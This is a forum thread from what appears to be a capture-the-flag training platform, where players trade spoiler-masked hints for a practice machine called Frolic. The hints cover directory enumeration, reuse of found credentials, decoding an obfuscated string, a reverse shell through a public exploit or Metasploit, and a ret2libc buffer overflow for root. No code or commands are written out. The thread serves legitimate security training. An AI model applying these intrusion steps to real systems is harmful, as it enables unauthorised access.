Frolic

So I found the baup/ dir and I see what looks to be breadcrumbs to a lp/ that says not authorized. Im trying to figure out how to dig into this but unsure what direction to move in! Any help would be fabs!

Where Oh Where to use these credentials.

Hello, I have idk*********s and enumerated the high http port but found nothing yet, I mean I found 4 dirs (one of them is loop) but found nowhere to use the pass. I’ve also found other service (brazilian dance) but doesn’t seem to be the way.
What am I missing?

I’ve also enumerated subdirs for every dir I’ve mentioned before. I’m stuck now, I’d appreciate any hint or nudge you can give me.
Thank you!

Oh! Almost forgot I also have a pair of creds, usr/pass, found in b****p dir but nowhere to use them.
I’m completely lost.

Edit: Done user! Thank you @clmtn

Hi guys, I have found the two pairs of credentials + the “idk” password.

Have enumerated directories as much as I could, using both Gobuster and Dirb, used different wordlists (for both directories, files) and still can’t find that login page for “ps" that everyone seems to find. I have found the "ps” directory but it just returns a 404 + I have tried to enumerate files and further directories from that one, with no success.

I keep running into those loop directories which are recursive up to a certain point, but I have a feeling that is just a rabbit hole.

Would appreciate a PM on which direction I should go :frowning:

I successfully logged-in p**YS*S.

Now how to get user? can’t able to determine p**YS*S version.

What type of shell I should here i.e bind or reverse.

what interface I need to use i.e eth0 or tun0.

I used metasploit but it starts reverse handler and then it shows “Exploit completed but no sessions was created”.

Please help

Type your comment> @laxudope said:

I successfully logged-in p**YS*S.

Now how to get user? can’t able to determine p**YS*S version.

What type of shell I should here i.e bind or reverse.

what interface I need to use i.e eth0 or tun0.

I used metasploit but it starts reverse handler and then it shows “Exploit completed but no sessions was created”.

Please help

I googled p******S vulns and found a git repo with a usefull script. :wink:

One should always google first, as a rule.

Good Luck!

this box is not frolic at all. regarding user searchsploit p*****s will also help

Took a few days, but finally popped this one. And although enjoyable (Maybe not so much at at the time) it shouldn’t have been the first one I attempted.

rooted :slight_smile: It was made difficult by removing gdb.

Thanks @clmtn for the help.

hint for r*p bof 52 in magic number

Anyone able to gimme a hand for root? Messing with this BOF Now and I’ve made some progress but unsure on where to go from here

EDIT:
Nvm rooted :stuck_out_tongue: Was my first BOF and managed to get it done with no hints. Just lots of research

Can anyone provide some hints? Have decode the …/? and now onto the second one but can’t get it to anything useful.

I decoded .!? not sure how to go about the next one. Can someone PM me with some hints?

can someone give me some hints? i got one username and password from /baup and two login, but it doesn’t work, i know it have p****ms. plz pm me. i didn’t found anything in s.

Type your comment> @B1ngDa0 said:

can someone give me some hints? i got one username and password from /baup and two login, but it doesn’t work, i know it have p****ms. plz pm me. i didn’t found anything in s.

decode “!.?.” and use it in p****ms for user.

@s0kIt said:
I decoded .!? not sure how to go about the next one. Can someone PM me with some hints?

Look carefully in JS, use that for login in n**x, then looks for subdirs. You may find something useful in “sub sub” directory

i get a weird behavior from meterpreter - can anyone help please?

rooted, i got user 3 months ago.
left root for a while, but read a lot and learn what it takes to own it.
was a very good practice. Feel free to PM if you need help no spoilers, I will give you the methods that lead me to it.

I’m trying to exploit the r*p binary.
I’ve already read all this that was posted here:
http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html

https://www.shellblade.net/docs/ret2libc.pdf

Also watched ippsec video.

I can’t make it work so I have a few questions:
1- Did you copy the binary to your own box to disas it? I think its not necessary since I have the addr and offsets.
2- Did you have to build a new binary? I don’t think it’s necessary either.
3- My reverse shell is a bit limited and don’t have all the output, can this be my problem? What did you do?

I’m a bit lost. The idea is really simple and I knew this technique before.

I hope there are no spoilers in this message, all the info posted here was mentioned before in the thread.
Any advise would be appreciated.

@epsequiel have a look at IPpsec October video :slight_smile:

Type your comment> @laxudope said:

Type your comment> @B1ngDa0 said:

can someone give me some hints? i got one username and password from /baup and two login, but it doesn’t work, i know it have p****ms. plz pm me. i didn’t found anything in s.

decode “!.?.” and use it in p****ms for user.

sry, i didn’t found the “!.?.”
can u pm me tell more? plz